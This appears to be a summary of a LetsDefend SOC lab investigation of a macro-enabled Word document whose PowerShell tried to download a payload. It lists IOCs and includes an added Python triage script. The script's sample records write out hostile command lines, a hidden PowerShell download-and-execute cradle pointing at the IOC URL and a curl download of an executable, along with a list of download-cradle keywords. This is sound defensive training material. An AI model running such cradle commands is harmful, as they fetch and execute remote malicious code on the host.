Analyzing Incident Malicious File Script Download Attempt Event ID 76 in LetsDefend

This article walks through the investigation of Event ID 76, Malicious File/Script Download Attempt, on the LetsDefend platform: identifying the actor behind the event and analysing the behaviour of the PowerShell script used in the attack. The investigation shows how a document delivered to a user can set harmful activity in motion and stresses the need for thorough log examination and threat assessment. Affected: LetsDefend platform, SOC operations, network security

Keypoints :

  • Event ID 76 records a malicious file/script download attempt.
  • The event was logged on March 14, 2021, at 19:15; the device action was Blocked because the download was judged malicious.
  • The trigger was a macro-enabled Word document, INVOICE PACKAGE LINK TO DOWNLOAD.docm.
  • The file hash (MD5: f2d0c66b801244c059f636d08a474079) was checked on VirusTotal, where 30 of 65 vendors flagged it as malicious.
  • Dynamic analysis in AnyRun showed the document launching PowerShell to retrieve and run remote content.
  • The PowerShell command downloads a file from filetransfer.io, a legitimate file-sharing service abused here to host the payload; because the domain itself is not malicious, the full download URL is the useful indicator.
  • Connection attempts were observed to 188.114.96.3 (Cloudflare) and 199.232.210.172 (Fastly). Both are shared CDN edge addresses, so on their own they identify the hosting provider rather than the attacker.
  • No significant logs were found for the analysed endpoint, NicolasPRD. The article reads this as possible evasion; the block recorded for the download would equally explain the absence of post-execution activity, so collection gaps should be ruled out before concluding evasion.
  • The investigation concluded that the payload was blocked, although further malicious activity was suspected.
  • In the closing report the team recorded that the malware had most likely been quarantined.

MITRE Techniques :

  • T1071 — Application Layer Protocol: use of HTTP/HTTPS for communication with command-and-control servers (here, the HTTPS download cradle).

Indicator of Compromise :

  • URL: filetransfer.io/data-package/UR2whub8V/download (malicious download source)
  • IP address: 188.114.96.3 (Cloudflare edge; shared infrastructure, low confidence on its own)
  • IP address: 199.232.210.172 (Fastly CDN edge; shared infrastructure, low confidence on its own)
  • MD5: f2d0c66b801244c059f636d08a474079 (hash of the .docm)
  • URL of the PowerShell download cradle: https://filetransfer.io/data-package/XXXXXX/download (package ID masked as shown in the source)
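As an added example (not code from the original article or from LetsDefend), the following Python script applies the triage logic described in the key points and the indicator list above to constructed Sysmon-style process-creation and network-connection records: it flags Office applications spawning script hosts, looks for download-cradle keywords in the command line, matches extracted URLs against the report's IOC URL, and counts contact with the listed Cloudflare/Fastly addresses only as low-confidence evidence because those are shared CDN edges. The hostnames other than NicolasPRD, the file paths, the command lines, the score weights and the file-sharing host list are assumptions made for the example; only the IOC values come from the report.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style records (EventID 1 = process creation, EventID 3 =
# network connection). Everything except the IOC values is invented for the example.
SAMPLE_EVENTS = [
    {"Host": "HR-WS-07", "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://filetransfer.io/data-package/UR2whub8V/download')\""},
    {"Host": "NicolasPRD", "EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"Host": "FIN-WS-02", "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl.exe -o %TEMP%\\a.exe https://example.invalid/payload"},
    {"Host": "NicolasPRD", "EventID": 3, "DestinationIp": "188.114.96.3", "DestinationPort": 443},
    {"Host": "NicolasPRD", "EventID": 3, "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Keywords typical of PowerShell/LOLBin download cradles (matched case-insensitively).
CRADLE_PATTERNS = [(name, re.compile(rx, re.I)) for name, rx in [
    ("downloadstring", r"downloadstring"), ("downloadfile", r"downloadfile"),
    ("webclient", r"net\.webclient"), ("invoke-webrequest", r"invoke-webrequest|\biwr\b"),
    ("invoke-expression", r"invoke-expression|\biex\b"), ("curl", r"\bcurl(\.exe)?\b"),
    ("bitsadmin", r"bitsadmin|start-bitstransfer"), ("certutil", r"certutil.*-urlcache"),
]]
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)

# IOCs from the report, weighted by how specific they are to this intrusion.
IOC_URLS = {"https://filetransfer.io/data-package/UR2whub8V/download"}   # +50: unique to the case
IOC_CDN_IPS = {"188.114.96.3", "199.232.210.172"}                       # +10: shared Cloudflare/Fastly edges
# Legitimate file-sharing services often abused for payload hosting (assumed list).
FILE_SHARING_HOSTS = {"filetransfer.io", "transfer.sh", "mega.nz"}       # +20


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return (score, reasons) for one record; a higher score means more likely malicious."""
    score, reasons = 0, []
    if event["EventID"] == 1:
        parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
        cmd = event["CommandLine"]
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            score += 40
            reasons.append(f"{parent} spawned {image}")
        hits = [name for name, rx in CRADLE_PATTERNS if rx.search(cmd)]
        if hits:
            score += 30
            reasons.append("download cradle keywords: " + ", ".join(hits))
        for url in URL_RE.findall(cmd):
            host = (urlparse(url).hostname or "").lower()
            if url in IOC_URLS:
                score += 50
                reasons.append(f"known IOC URL {url}")
            elif host in FILE_SHARING_HOSTS:
                score += 20
                reasons.append(f"download from file-sharing service {host}")
    elif event["EventID"] == 3 and event["DestinationIp"] in IOC_CDN_IPS:
        score += 10
        reasons.append(f"contact with CDN edge {event['DestinationIp']} (low confidence: shared infrastructure)")
    return score, reasons


def host_summary(events, host):
    """Roll up every record for one host into a single verdict."""
    scored = [triage(e) for e in events if e["Host"] == host]
    if not scored:
        return {"host": host, "max_score": 0, "verdict": "no telemetry",
                "reasons": ["no records: confirm log collection before calling it evasion"]}
    score, reasons = max(scored, key=lambda sr: sr[0])
    if score >= 90:
        verdict = "escalate"
    elif score >= 40:
        verdict = "review"
    elif score > 0:
        verdict = "low-confidence only"
    else:
        verdict = "benign"
    return {"host": host, "max_score": score, "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    for h in ("HR-WS-07", "NicolasPRD", "FIN-WS-02", "UNKNOWN-HOST"):
        print(host_summary(SAMPLE_EVENTS, h))
```

Run stand-alone, the host that spawned the cradle is escalated, the Excel-to-curl host is marked for review, and NicolasPRD comes out as "low-confidence only" because its only match is a connection to a CDN edge: the same shape as the case above, where nothing at process level survived the block. A host with no records at all gets "no telemetry" rather than a malicious verdict, which is the check to make before reading an empty log as evasion.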

Full Story: https://medium.com/@arashiyans/menganalisis-incident-malicious-file-script-download-attempt-event-id-76-di-letsdefend-675d25264804?source=rss——cybersecurity-5